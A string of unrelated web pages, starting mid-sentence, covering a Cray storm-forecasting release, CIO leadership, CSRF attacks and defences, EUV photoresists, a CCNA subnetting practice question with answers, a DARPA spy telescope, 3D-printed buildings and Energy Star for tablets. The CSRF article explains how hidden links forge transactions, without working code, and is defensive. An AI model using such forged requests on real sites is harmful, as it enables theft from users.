explained Dr. Ming Xue, director of CAPS. "Each member had a
4-kilometer horizontal resolution and covered almost the entire
continental U.S. Unlike a single-model forecast, this ensemble not
only predicted when and where particular weather might occur, but
also the likelihood of its occurrence."
"Ensembles have been employed by larger-scale weather models before,
but they've never been focused on the few-kilometer scales where
individual storms actually occur," Dr. Xue continued. "The ensemble
approach is exceptionally demanding when it comes to computational
power and can only be accomplished on a high-performance, scalable
system such as the Cray XT(TM)-based system at PSC."
Every day during the course of the experiment, terabytes (trillions
of bytes) of data were generated, archived and transferred from PSC to
Norman, Oklahoma, for use in forecasts, evaluations and future
analysis and research. The HWT facility in Norman is strategically
located in the recently built National Weather Center between the
operational forecast areas of the NOAA Storm Prediction Center (SPC)
and the NOAA National Weather Service Norman Forecast Office. These
two offices, together with the NOAA National Severe Storms Laboratory
(NSSL), led the experiment during the time of year when severe storm
activity typically peaks in the region.
"The researchers had previously struggled to complete a single
modeling run per day thus hampering a comprehensive understanding of
how severe storms and tornadoes form," said Per Nyberg, Cray
Marketing Director for Earth Sciences. "The scalability and sustained
performance of the Cray XT system at PSC allowed them to complete 11
runs each day while using more sophisticated parameterizations. This
is a key step in helping forecasters predict violent storms in time
to prevent injury and loss of life."
About the NOAA Hazardous Weather Testbed Spring Experiment
The Spring Experiment conducted jointly by the SPC and NSSL would not
have been possible without contributions from multiple partners. These
two organizations, along with NOAA's Environmental Modeling Center
(EMC) and the National Center for Atmospheric Research (NCAR), worked
with CAPS and PSC in the design and execution of the ensemble
forecasts. In addition, EMC and NCAR provided separate
high-resolution WRF model forecasts for a complementary portion of
the experiment. The WRF model was developed primarily at NCAR and
EMC. The CAPS forecasts were produced under the support of the NOAA
CSTAR program and the National Science Foundation Linked Environments
for Atmospheric Discovery Large ITR project. The NSF TeraGrid and
National Lambda Rail networks connected the groups in Pittsburgh and
Norman. Go to http://hwt.nssl.noaa.gov/Spring_2007/ for more
About Cray Inc.
As a global leader in supercomputing, Cray provides highly advanced
supercomputers and world-class services and support to government,
industry and academia. Cray technology enables scientists and
engineers to achieve remarkable breakthroughs by accelerating
performance, improving efficiency and extending the capabilities of
their most demanding applications. Cray's Adaptive Supercomputing
vision will result in innovative next-generation products that
integrate diverse processing technologies into a unified
architecture, allowing customers to surpass today's limitations and
meeting the market's continued demand for realized performance. Go to
www.cray.com for more information.
Cray is a registered trademark, and Cray XT is a trademark, of Cray
Inc. All other trademarks are the property of their respective owners.
SOURCE: Cray Inc. | <urn:uuid:5ffc0a6d-5e9f-45cb-8b93-52ad4db65f03> | CC-MAIN-2017-04 | http://investors.cray.com/phoenix.zhtml?c=98390&p=irol-newsArticle&ID=1045957&highlight= | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00268-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.887098 | 1,030 | 2.578125 | 3 |
My favorite definition of leadership comes from Warren Bennis: "Leadership is a function of knowing yourself, having a vision that is well communicated, building trust among colleagues, and taking effective action to realize your own leadership potential."
But I must add to this, borrowing from John C. Maxwell, who simply stated, "Leadership is influence -- nothing more, nothing less."
Followers are influenced by leaders either by a carrot or stick, or by something better; something they believe in -- vision. There are good leaders and bad leaders, there are Stalins and Hitlers as there are Roosevelts and Churchills. Each had a vision -- good or evil -- and influence over others, -- whether by trust or coercion. Bennis' definition of leadership encompasses traits such as "vision, communication, trust and effective action."
These are critical traits, for a leader must have a defined vision of what needs to be achieved, communicate it comprehensibly to others so they are inclined to share it -- and have the trust of colleagues that they have the skills necessary to realize the vision -- and can deliver it.
These traits could be further defined to include practicality, realism, creativity, innovation, technical competence, human compassion and understanding, integrity, faith, intelligence, etc. Therefore, leadership is multidimensional -- it requires several traits rolled into one individual.
Management is the art of how to do something well. Or to quote Bennis again, "Managers are people who do the things right and leaders are people who do the right thing." We all know managers -- they make sure account ledgers are correct and books are balanced; they ensure the buses run on time; they make sure 911 calls are answered in x number of minutes, etc. We need managers.
But leaders challenge the status quo through innovation and energize people looking out to the future. Leaders see opportunities that can make an organization perform better rather than making an organization meet stated metrics. Most importantly, leaders can get a reticent organization to adopt a new direction or change how it does business to achieve better performance and even change the culture of an organization.
Changing Politics and Culture
All leaders at their level or organizational sphere need to understand the environment (internal and external) in order to exert influence and change the organizational behavior to a desired outcome. This is where it all comes together, where leadership success or failure occurs.
The word politics is often perceived as dirty. It invokes a sense of distrust, self-serving actions for an individual or specific group's gain, and conjures up images of dishonest politicians. The official definition is "the process and conduct of decision-making for groups."
Politics is a very basic human characteristic, and one can see politics being played out in groups or organizations. The power or ability to impose one's will on another is a key tenet of politics -- it is sought and used to make decisions that favor a particular individual or group, or in plainer text, those who get to make the rules. The key here is that organizations are collections of humans, each of whom has individual needs and wants, and vie for decision-making power that suits their own objectives.
Organizations compete with other organizations for power, prestige, influence and resources. So while many may scoff at politics, it is simply human nature; to be an effective leader, one must understand both internal and external politics that affect an organization, particularly who the key stakeholders are. This is a particularly important consideration in government where power is diffused through law and government structures, and where there is a lack of market forces. This environment requires greater attention to coalition-building and assessing the effects of change on an organization in which internal sub-groups and external interest groups have a stake. Attempting change without lining up support--or power--can bring about failure or other unintended consequences.
Leaders have an important role in forming and changing organizational culture in reaction or in anticipation to a changing environment. Organizations and their members are survivalists and must successfully adapt to a constantly changing environment. Making a bad decision can have disastrous consequences for both in terms of survival or status.
I know this sounds fairly Darwinian, but one of the most perplexing questions I have continually asked myself throughout my career is, "Why are organizations and their members incredibly resistant to change, even though the change is well thought out, rational and beneficial?" Perhaps I thought they debated and vetted the change internally first before blindly accepting it; perhaps this is a good idea to simply avoid a bad decision, or change for the worse, which would threaten its survival.
So now that we've covered leadership, management, politics and culture -- how do these relate to public-sector leaders and CIOs? As I said before, public-sector organizations are designed to operate in a diffuse power environment, and market forces don't readily apply to the public-sector environment as they do in the private sector, though political forces are very key to public-sector environments.
After all, government makes rules for all of us, and therefore is subject to intense political forces. Bureaucracies are somewhat constrained by checks and balances coming from multiple oversight bodies, media attention and numerous rules that guide their mission and power, and tend to change more gradually than their private-sector counterparts. Though in rare events such as war or depression, strong political forces can produce rapid and efficient change.
Unlike their private-sector counterparts, public-sector leaders do not receive handsome rewards for leading rapid change; in fact, one may say they are rewarded for slow change. That makes their jobs more interesting and challenging in affecting their vision because they must convince a diverse set of stakeholders to support them in that vision and garner their help to achieve it.
CIOs are unique executives -- they make their living by introducing technology to an organization that requires them to be lead change agents since technology almost always leads to a change in business processes. CIOs must earn the trust of their leadership and peers in their ability to create an organization capable of delivering key technology systems.
Through this trust they can garner more support to introduce new systems by being meticulous in how they are affecting organizational culture. A CIO who cannot deliver technology effectively to his or her key customers (i.e., police, fire, transportation, etc.) will not be trusted, and therefore will be ineffective. Like all leaders, CIOs must assess their own organization and environment, and change it to deliver key systems.
A CIO in the public sector is like his peers (CFOs, police chiefs, etc.) -- a member of a team with a specific role. As a team member, he or she must be trusted to deliver. I know this sounds basic, but sometimes delivering -- much as a CEO delivers shareholder value -- requires a great deal of leadership.
A CIO is part of a team and must work as a trusted member of his or her organization's senior management team, and in full alignment with the secretary. While most outsourcing engagements in the private sector are done rapidly, implementation of the Maryland Department of Transportation's (MDOT's) standardized network and communications system took about three and a half years. The additional time was needed to build the support in a diffuse power environment of a large government organization. The outcome, however, was the same.
One of my favorite comments on the project to create a standardized network and communications system was when the capital planning director, a very seasoned and well respected individual, came to me and said, "Whew, you know you really took us [MDOT] to the brink on this one, I had my doubts we would get through, but you and the CFO seemed to know just when to pull back and push forward. In the end, we would never have achieved this any other way -- thanks." | <urn:uuid:014ec69b-bf62-47fd-a0f1-5984832c32e4> | CC-MAIN-2017-04 | http://www.govtech.com/magazines/pcio/Influence-and-the-Art-of-Doing.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00268-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.966017 | 1,592 | 2.5625 | 3 |
What You'll Learn
- Components of a database and how to work with those components
- Open a table, find information stored there, and enter data
- Create several query types, edit and run queries, and use action and calculation queries
- Create several report types, enhance reports, and print preview reports.
- Preview and print database objects, and change the page setup options
Who Needs To Attend
Those who are new to Microsoft Access 2010 | <urn:uuid:9d0c0bea-412c-4f69-92aa-4ad64b4e9f57> | CC-MAIN-2017-04 | https://www.globalknowledge.com/ca-en/course/116311/microsoft-access-2010-level-1-data-entry-and-reports/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00296-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.870087 | 92 | 3.15625 | 3 |
Five Ways to Reduce Your Vulnerability to CSRF Attacks
Are any corporate Web applications running on your network susceptible to cross-site request forgery (CSRF)? It's a question worth asking, because a successful CSRF attack -- aka an XSRF, Sea Surf, session riding, hostile linking, or One-Click attack -- can have devastating consequences, potentially costing your company a great deal of money or resulting in the loss of confidential information.
So what is CSRF?
A CSRF attack causes your Web application to carry out an action (such as transferring money, making a purchase or changing an account password) by making the application believe that the request resulting in this action is coming from an authorized user of the application. That could be an employee at your company, a business partner, or an external customer.
To achieve this, a CSRF attack relies on the fact that many Web applications use nothing more than a cookie with a relatively long expiration time to enable users to continue accessing the application after they initially authenticate themselves.
For a CSRF attack to work, then, a potential victim first has to use their browser to authenticate themselves and log on to your Web application. As long as the user does not subsequently log out of the application, and until the cookie from the application in the user's browser expires, the user is a potential victim of a CSRF attack.
How does a CSRF attack work?
To carry out a CSRF attack, a hacker places a specially crafted link to your Web application (which a potential victim is known to use) on some other Web page or in an email. But rather than making the link a standard hyperlink, the hacker typically hides the link by placing it in an image or script tag, with the link as the image's or script's source.
An example of such a link (from Wikipedia) is:
Now if the victim views the Web page with this "image" on it in their browser, or reads an email containing this link in an email program which uses the browser's HTML rendering capabilities, the browser will attempt to fetch the "image" by following the link. And if the victim has recently logged in to the site, their browser will provide a cookie to authenticate, and tell the Web application to transfer $100,000 from the account "bob" to the account "mallory." In general there is no reason that the victim would know that the transaction has been carried out (at least until they check their bank balance) because the victim's browser would carry out the transaction without displaying any feedback (such as a confirmation Web page) from bank.example.com.
In the example above, the link is specifically targeted at bob, which limits its usefulness. In practice a hacker is likely to try to use a more generic link that would work with any potential victim that happens to be logged in to your Web application. But crafting a successful CSRF is hard for the attacker precisely because they get no feedback from your Web application during the attack. That means that the attack is only likely to be successful as long as the responses from your Web application are entirely predictable, and involve nothing more than further clicks (for example, to confirm a transaction) which can be included in a script.
So for your Web application to be susceptible to a CSRF attack, it must:
- Allow access to users with nothing more than a valid cookie. with a usefully long time before expiry
- Allow transactions to be carried out on submission of a suitable URL that can be sent from an external site
- Respond in a predictable way
What can a CSRF attack achieve?
Although a CSRF attack can "only" carry out a transaction in a Web application, the results can be very far-ranging indeed. For example, it could result in the victim unwittingly making a forum posting, subscribing to a mailing list, making purchases or stock trades, or carrying out activities such as changing a user name or password. CSRF attacks work on applications protected behind the same firewall that the victim is located, and can allow a hacker to access an application which has access restricted by IP range if the victim's machine is within that range.
A strange twist on CSRF is called login CSRF, which logs a victim into a Web application using the attacker's credentials. This allows the hacker to log in subsequently and retrieve information about the victim, such as the user's activity history, or any confidential information that has been submitted by the victim.
How to mitigate the risk of your Web applications being vulnerable to CSRF attacks
- Limit the time-to-expiration of authentication cookies. The shorter the period in which these cookies are valid, the smaller the window of opportunity for a hacker to exploit your Web application. However, the shorter the period the more inconvenient it is for users. In the end, as is often the case, there is a compromise to be made between convenience and security.
- Make users submit additional information before allowing important transactions to be carried out. Requiring a user to solve a CAPTCHA or enter a password before important transactions can be carried out can prevent a hacker from carrying out an attack (as long as the password is not stored in the browser) because this information is not predictable (CAPTCHA) or freely available (password).
- Use secret non-predictable validation tokens. CSRF attacks work when a session is identified only by the cookie stored in the user's browser. So they can be foiled by having additional session-specific information in each HTTP request that a attacker can't know in advance, and therefore add to a link. If the app has an existing cross site scripting vulnerability it might still enable a hacker to access this validation token, however.
- Use custom HTTP headers. The XMLHttpRequest API can be used to protect against CSRF attacks if all requests that carry out a transaction use XMLHttpRequest and attach a custom HTTP header, rejecting any such requests which lack the custom header. This is useful because browsers normally only allow sites to send custom HTTP headers to the same site, thus preventing a transaction being initiated from the site which is the source of the CSRF attack.
- Check the referrer header. When a browser sends an HTTP request it usually includes the URL that it originated from in the referrer header. In theory you can use this information to block requests that originate from another site instead of from within the Web application itself. Unfortunately the referer header is not always present (some organizations strip it out for privacy reasons, for example) or can be spoofed, so this measure is not really effective. | <urn:uuid:d3c89102-2370-4456-a843-692a6a7a3d7b> | CC-MAIN-2017-04 | http://www.enterprisenetworkingplanet.com/print/netsecur/article.php/3920871/Five-Ways-to-Reduce-Your-Vulnerability-to-CSRF-Attacks.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281746.82/warc/CC-MAIN-20170116095121-00414-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.922153 | 1,356 | 2.84375 | 3 |
Over the last five decades, microprocessors have gotten cheaper and more powerful as predicted by Gordon Moore’s famous observation, which states that the number of transistors on an integrated circuit doubles every two years. However, the limits of miniaturization can only go so far before crossing the quantum threshold.
Currently there is some progress left to exploit as the industry heads beyond 22-nanometer process technology, but doing so requires new tools. One of these indispensable tools is a chemical called a photoresist, sometimes shortened to “resist,” a light-sensitive liquid plastic used to etch the lines and features on a chip.
Chip designers recognized that in order support ever-shrinking process geometries, a new kind of resist was needed. A collaboration formed between Intel and the US Department of Energy’s Lawrence Berkeley National Lab (Berkeley Lab) to address this challenge.
The research resulted a much-improved resist that combines the properties of two already-existing kinds of resist and retains the best properties of both, i.e., better light sensitivity and mechanical stability.
“We discovered that mixing chemical groups, including cross linkers and a particular type of ester, could improve the resist’s performance,” says Paul Ashby, staff scientist at Berkeley Lab’s Molecular Foundry, a DOE Office of Science user facility. The research is written up in the journal Nanotechnology.
The process of transferring images onto a substrate is known as lithography. In chipmaking, the wafer is first cleaned and then coated with a layer of photoresist. Then ultraviolet light is used to project an image of the desired circuit pattern including components such as wires and transistors. The resist exposed to the light hardens and the non-exposed part is chemically washed away.
The issue with today’s resist is that it isn’t compatible with the new light source, called extreme ultraviolet (EUVL), necessary for smaller process nodes. EUVL has a much shorter wavelength – just 13.5 nanometers – than the current standard, called deep ultraviolet light, which has wavelengths of 248 and 193 nanometers.
“The semiconductor industry wants to go to smaller and smaller features,” explains Ashby, adding that “you also need the resist materials that can pattern to the resolution that extreme ultraviolet can promise.”
The Intel and Berkeley Lab researchers combined two types of resists in various concentrations to create the new material, which is suitable for patterning smaller feature sizes in tandem with EUVL. Next, the researchers plan to further optimize the new resist for even smaller componentry, down to the 10-nanometer node.
The research project was funded by Intel, JSR Micro and the DOE Office of Science, all of whom have a vested interest in keeping Moore’s law alive as long as possible. | <urn:uuid:f2c89a79-2521-4894-af0b-2efa5ddabc3a> | CC-MAIN-2017-04 | https://www.hpcwire.com/2014/07/17/new-photoresist-add-years-moores-law/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281746.82/warc/CC-MAIN-20170116095121-00414-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.936195 | 591 | 3.796875 | 4 |
In today’s CCENT/CCNA blog posting, we are going to look at a pretty complex subnetting question that is pretty typical of what you would see on the CCENT 100-101 exam or the composite CCNA 200-120 exam. What you will see here is a networking topology diagram that Cisco will provide to you on the exam with a base scenario of requirements to meet their desired design requirements. The key to this type of exam question is to make sure you read the question very carefully and look for keywords like fewest, least, most, less than, etc. As multiple answers may actually work, but only one will meet the exact requirements of the exam question. So let’s begin below where Cisco sets the stage with the introduction covering the exam question.
Refer to the exhibit. All of the routers in the network are configured with the ip subnet-zero command. Which network addresses should be used for Link A and Network A with the fewest wasted ip addresses? (Choose two)
CCNA Subnetting Question
One of the things that many students are surprised about when they take their first CCENT (Cisco Certified Entry Networking Technician) 100-101 or CCNA (Cisco Certified Networking Associate) 200-120 exam is that the questions are not straight forward and simple networking theory. I hear it time and time again from people who thought they could guess their way through a Cisco certification exam. Where that might have been true 10 years ago with some easy multiple choice questions where you could rule out two of the four answer and you had a 50/50 chance; it is no longer like that on today’s Cisco exams. That is why Cisco is one of the premier certification exams out there. So now take a look at the possible answers below and let’s try to determine which answers below are correct. One thing that might help you is to write down the subnet chart on the wipable board that you are given when you enter the testing center. This way you don’t have to figure out the subnetting ranges and masks multiple times on the 10 or so subnetting questions you are bound to receive on the exam. This will save you precious moments that you will need on your exam!
A. Network A – 192.168.13.0/24
B. Network A – 192.168.13.0/25
C. Network A – 192.168.13.128/26
D. Link A – 192.168.10.0/29
E. Link A – 192.168.10.0/30
F. Link A – 192.168.10.2/30
VLSM, CIDR, Subnetting Explanation and Answer Overview
In this question, you need to refer to the topology diagram in the upper left hand corner to note that network A needs 129 hosts. Therefore, we need to determine the correct subnet mask. There is only 1 answer that fits this and it is A. Answer B and C are incorrect since none of them can accommodate all the host IP addresses that are needed in network A. Answer B would give us only 126 hosts and answer C would give us only 62 hosts.
Link A is a point to point link, therefore the appropriate subnet mask is /30 which means both E and F are possibilities. However, answer F is wrong since this is not a network address. Out of D and E, D will give us 6 possible hosts whereas E will give us only 3 possible hosts. Thus answer E wastes the least amount of IPs and thus is correct.
So our correct answers for this exam question are A and E.
Want to really turbo charge your CCENT and CCNA learning? Look at building your very own CCNA home lab! With your own lab you will be able to see these subnetting concepts and so much more in action. It will not only help you pass your certification exam easily, it will help prepare you for the real world. As passing the exam is only the first part of the equation. Next you will interview and you will want to have a leg up on all the other candidates with real world, hands-on experience that you can speak to in your interview. Just think how much more impressed the hiring manager will be that you took the initiative to invest in yourself. So if you are worth it, look at investing a few hundred dollars into your education to get that big paying Cisco job! | <urn:uuid:0d4275a0-734e-4afb-823a-e45727d57909> | CC-MAIN-2017-04 | https://www.certificationkits.com/ccent-100-101-ccna-200-120-detailed-subnetting-exam-question/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00048-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.956177 | 924 | 3.15625 | 3 |
While you may not be concerned about Santa Claus spying on you in real-time to find out if you are good or bad, he's not the only one who is making a list and checking it twice, planning to find out who is naughty or nice. Leave it to the DARPA, the Pentagon's research arm, to make Santa's magical powers of surveillance look quaint.
Satellites zooming in at any time on any spot on globe to stream real-time video is like something you see in the movies, but DARPA has envisioned a giant spy eye with a massive contact lens peering down at our planet to meet national security needs. This lens would be about 66 feet in diameter and would be attached to a space-based spy telescope in order to hover in orbit and "take real-time images or live video of any spot on Earth." DARPA said such capabilities do not currently exist, but the Membrane Optical Imager for Real-Time Exploitation (MOIRE) program will change all of that.
"Today, aircraft are used for some imagery requirements," DARPA noted. "Because of the huge quantity of aircraft needed, and because aircraft do not fly high enough to see into denied territories, spacecraft are also used for imagery requirements." The listing on Federal Business Opportunities called for an "innovative system-oriented research proposals in the area of large, low cost, lightweight, deployable, visible and/or infrared electro-optical systems for persistent, tactical, real-time video over denied territory for missile launch detection and tracking from geosynchronous orbit."
"Taking live video of a single location would require satellites to hover by matching the Earth's rotation in geosynchronous orbit about 22,000 miles (36,000 kilometers) high - but creating and launching a space telescope with the huge optics arrays capable of seeing ground details from such high orbit has proven difficult," reported MSNBC. Ball Aerospace has completed a proof-of-concept membrane optics review for the DARPA contract. "Such a telescope should be able to spot missile launcher vehicles moving at speeds of up to 60 mph on the ground. That would also require the image resolution to see objects less than 10 feet (3 m) long within a single image pixel."
According Public Intelligence, this dream military space telescope could cost about $500 million. "It would be able to image an area greater than 100 x 100 km [almost 63 X 63 miles ] with a video update rate of at least one frame a second, providing a 99% chance of detecting a Scud-class missile launch," reported Aviation Week.
This could give a whole new meaning to you better watch out, you better not cry . . . cause if you make it on the naughty list next year, there may be real-time streaming by the giant eye in the sky with recorded proof of how you've been bad or good.
This DARPA tech is not supposed to be aimed at regular folks like us, but it made me recall an ancient movie. This is not the portion showing the satellites zooming in on targets, but in today's world of tech this no longer seems so far-fetched.
Like this? Here's more posts:
- Can Microsoft Xbox's voice as a remote control win the hearts of Siri lovers?
- Fourth Amendment's Future if Gov't Uses Virtual Force and Trojan Horse Warrants?
- 4th Amendment vs Virtual Force by Feds, Trojan Horse Warrants for Remote Searches?
- Irony: Surveillance Industry Objects to Spying Secrets & Mass Monitoring Leaks
- Skype Exploits: I know where you are, what you are sharing, and how to best stalk you
- Real life HAL 9000 meets Skynet: AI controlled video surveillance society
- Lulzlover Hacked Coalition of Law Enforcement, Data Dumped for 2,400 cops and feds
- Privacy Nightmare: Data Mine & Analyze all College Students' Online Activities
- Busted! DOJ says you might be a felon if you clicked a link or opened email
- Microsoft Research: Hunting for HIV vaccine with techniques that fight spam
- Secret Snoop Conference for Gov't Spying: Go Stealth, Hit a Hundred Thousand Targets
- PROTECT-IP or control freaks? Monster Cable blacklists Sears, Facebook as rogue sites
- CNET Accused of Wrapping Malware in Windows Installer for Nmap Security Tool
- Do you give up a reasonable expectation of privacy by carrying a cell phone?
Follow me on Twitter @PrivacyFanatic | <urn:uuid:d190b997-54f6-4bc3-bf44-51c9564089ff> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2221341/microsoft-subnet/darpa-s-spy-telescope-will-stream-real-time-video-from-any-spot-on-earth.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00258-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.915669 | 929 | 2.515625 | 3 |
Law enforcement officials already use breathalyzers to measure drivers' blood alcohol content, but will they soon use the technology to test for cocaine and marijuana use?
Scientists from Stockholm’s Karolinska Institute announced that they have found a method for detecting drugs in people’s systems, according to a new report. Using a breathalyzer-type device, they successfully detected the use of marijuana, cocaine, amphetamine and prescription drugs like diazepam and buprenorphine.
According to Phys.org, the scientists gathered samples from a portable device equipped with a mouthpiece and a micro-particle filter. “When a patient breathes into the mouthpiece, saliva and larger particles are separated from the micro-particles that need to be measured.”
The findings on this new research were published Friday, 26 April, in the Journal of Breath Research.
“Exhaled breath contains very small particles that carry non-volatile substances from the airway lining fluid," according to Phys.org. “Any compound that has been inhaled, or is present in the blood, may contaminate this fluid and pass into the breath when the airways open. The compounds will then be exhaled and can subsequently be detected.” | <urn:uuid:ebb6ae88-5e12-4207-b386-645a0095896e> | CC-MAIN-2017-04 | http://www.govtech.com/technology/Breath-Testing-for-Pot-and-Cocaine.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279650.31/warc/CC-MAIN-20170116095119-00562-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.929673 | 261 | 2.6875 | 3 |
Within a couple of years, researchers at the University of Southern California believe 3D printing techniques will be used to construct entire buildings in less than a day.
As outrageous as it sounds, such machines can already extrude concrete walls with internal reinforcement fast enough to complete the shell of a 2,000-sq. ft. house in under 20 hours.
The technology was demonstrated this week at the Inside 3D Printing Conference and Expo here.
The robotic extruding method, called Contour Crafting, is comparable to its smaller 3D desktop printer counterparts in that it takes its orders from CAD software, which stores and executes the architectural designs. The designs can be customized on a construction site even as work is underway.
The machines can also automatically embed all the conduits for electrical, plumbing and air-conditioning, as well as place electronic sensors to monitor the building's temperature and health over time.
Behrokh Khoshnevis, a professor of industrial and systems engineering at the USC's Viterbi School of Engineering, is leading the effort to perfect the Contour Crafting construction technology.
Khoshnevis said that he expects the technology will be commercially viable within two years.
Contour Crafting could help solve one of the largest problems facing the world today, a lack of decent housing for more than a billion people, Khoshnevis said.
Today, construction is slow, labor intensive, inefficient -- and the most hazardous job in the world, with 400,000 people injured 6,000 to 10,000 killed in construction accidents every year in the U.S. alone.
"It is wasteful and emission causing and corruption prone. And, the cost is always over budget," Khoshnevis said. "What we aspire to do is create neighborhoods that are dignified at a fraction of the cost, a fraction of the time and far more safety with beautiful architectural designs."
Structures not only can be constructed of concrete but also of hybrid materials. For example, the outer shell of a wall can be plaster with polymer or cement filler. Steel reinforcement in for form of coils can also be added to the mix.
A Contour Crafting-machine, which is made up of a metal gantry frame, along with the robotic extruding system, weighs about 500 pounds. It comes in two pieces and can be quickly erected on a construction site, Khoshnevis said.
The gantry frames can be modified to climb structures, creating one story at a time until it reaches the top of a building. Then the robotic gantry could climb back down the sides of the building.
Each layer of concrete extruded by the machine is four inches thick and about six inches in height. Using special hardeners in the concrete, the material is hard enough to support the next layer by the time the machine circumnavigates the outside perimeter of a structure.
Because the materials are extruded through a nozzle, the walls of a building can take any form - thus the name "Contour Crafting."
The structures can look like the Adobe structures made of mud, clay and straw (or other domestic materials) in Africa, West Asia, and more arid parts of the Americas. Adobe structures have been a construction method for thousands of years; and can last hundreds of years.
"The reason they last is not the material. The strength comes from the geometry," Khoshnevis said. "The worst structures you can use are planar [flat] walls."
Khoshnevis demonstrated the strength of a contoured structure by holding a sheet of paper up and blowing on it, which bent if over. He then rolled the paper in a semi-circle and blew on it again; it remained upright.
Using Contour Crafting on the Moon and Mars
Khoshnevis, also a professor of aerospace and mechanical engineering at USC, is also working with the National Aeronautics and Space Administration (NASA) on a plan for creating structures on the Moon and Mars.
"The proposal we have is rather than take segments of buildings and transport them there, just take the machinery there ... and use the local material and make them there," Khoshnevis said.
The USC team is in phase two of an advanced concept for the off-world structures.
"The objective of NASA is to build settlements, outposts," he said. "Nothing's been said about human operated missions. Those can come later."
One problem with constructing landing pads, roads, or blast walls to protect living quarters on other planets is that water cannot be used. Because of the thin atmosphere on Mars, and lack thereof on the moon, water would evaporate from cement or concrete, leaving it to return to its origin of dust and rocks.
The USC researchers solved that problem by melting sulfur for use as a binder, binding the sand like cement.
"We have already shown the ability to build using Martian materials," he said.
The USC team also came up with a plan to combat the high temperatures on the sunny areas of the Moon -- creating interlocking ceramic tiles that can resist temperatures of up to 2,000 degrees Celsius. The tiles can be locked together to create structures. The machines could not only extrude the ceramic material, but a separate component could them assemble them into structure.
Another method of building structures is to use lithium disilicate, a glass-ceramic material that can be heated and poured out like molten lava to form structures on off-planet worlds.
While robotics could handle construction off world, here on Earth Contour Crafting would require far fewer laborers to build houses and other structures. Labor makes up 45% to 55% of construction costs, Khoshnevis said.
"It could be much cheaper than prefab structures and much, much cheaper than conventional construction," he said. "Nothing beats contour construction on cost."
The labor issue has already become a point of controversy -- some observers have have complained that machines would replace construction workers, leaving them without jobs, Khoshenevis said.
"My response to that is it's not going to happen overnight," he said. "Second, this is not a new question. When the steam engine was invented they said what's going to happen to carriage drivers?"
Khoshenevis pointed out that at the end of the 19th century in the U.S. 62.5% of Americans were farmers. Today, less than 1% work to grow our produce. "The world did not come to a standstill from such a major change," he said.
This story, "3D Printing Techniques Will Be Used to Construct Buildings, Here and in Outer Space" was originally published by Computerworld. | <urn:uuid:34f199cd-ba5d-4f6f-9e0e-adbac22705c7> | CC-MAIN-2017-04 | http://www.cio.com/article/2382425/hardware/3d-printing-techniques-will-be-used-to-construct-buildings--here-and-in-outer-space.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00102-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.954403 | 1,368 | 2.859375 | 3 |
Tablets will be rated based on the Energy Star specification in the future.
The specification will be part of the Energy Star version 6.1, according to documents posted on the U.S. Energy Star website. But a date for ratings on tablets has not yet been established, said Robert Meyers, product manager at Energy Star computers. Energy Star is a joint effort between the U.S. Environmental Protection Agency and the U.S. Department of Energy.
The Energy Star specification helps shoppers identify the most power-efficient products when making purchases. The Energy Star program already covers laptops, desktops, monitors, light bulbs, servers, household appliances and other products that are identified with a label. The use of Energy Star-labeled products helped cut close to $18 billion from U.S. utility bills in 2010, according to the organization.
The EPA and DOE originally floated the idea of including tablets as part of Energy Star version 6.0 for products like laptops, desktops, displays, thin clients and networking equipment, which goes into effect on June 1. Some IT vendors that participate in the Energy Star program argued against the immediate inclusion of tablets, saying that those devices are more like smartphones than PCs and have different assembly and equipment. They argued that tablets and laptops differ on components such as batteries and networking equipment, and thus cannot be grouped together with PCs. The EPA and those stakeholders are now trying to gather a consensus on the definition of tablets and how to rate the devices.
"Defining and differentiating tablets will be part of the process, but at this point we don't have anything concrete," Meyers said.
The Energy Star standard for tablets would lead to the advantage of a decrease in energy use over the life of a device, said Casey Harrell, IT analyst at Greenpeace International.
"It won't remove hazardous materials from a product ... but indirectly will impact toxic pollution. More energy efficient devices use less energy and less pollution from those energy sources," Harrell said.
Energy Star should be more ambitious, but at a ground level, the standard sets the ball rolling in the right direction around energy savings in tablets, Harrell said.
"Creating a product-specific standard, like [for] tablets, allows for the standard to be built more uniquely for these specific products and gives the products an opportunity to compete in an apples-to-apples environment," Harrell said. "For a long time, many devices -- netbooks, even game consoles -- were looped into the same PC standard."
Energy Star is a key metric in the EPEAT (Electronic Product Environmental Assessment Tool) rating, which is used by many government organizations and universities to make hardware purchases. EPEAT also takes into account toxic elements, material selection, product longevity and other energy efficiency attributes to rate environmentally friendly hardware. | <urn:uuid:d6218f60-de14-4a3e-a074-cfd7957b6847> | CC-MAIN-2017-04 | http://www.itworld.com/article/2714907/consumerization/tablets-to-get-energy-star-ratings.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280310.48/warc/CC-MAIN-20170116095120-00314-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940462 | 577 | 2.640625 | 3 |
And perhaps this car breaks down one too many times, or we have children and need more space or for a host of other reasons we determine that it is time to replace it with a new one.
We visualize the need for better service, access, technology, or perhaps even capacity.
The cycle of a network's life is similar: idea or concept, design and implementation, operation, legacy integration, and eventually transformation. This article will examine the development or transformation of a network using a life-cycle model and demonstrate how this process can benefit an organization.
There are four basic steps to the transformation process:
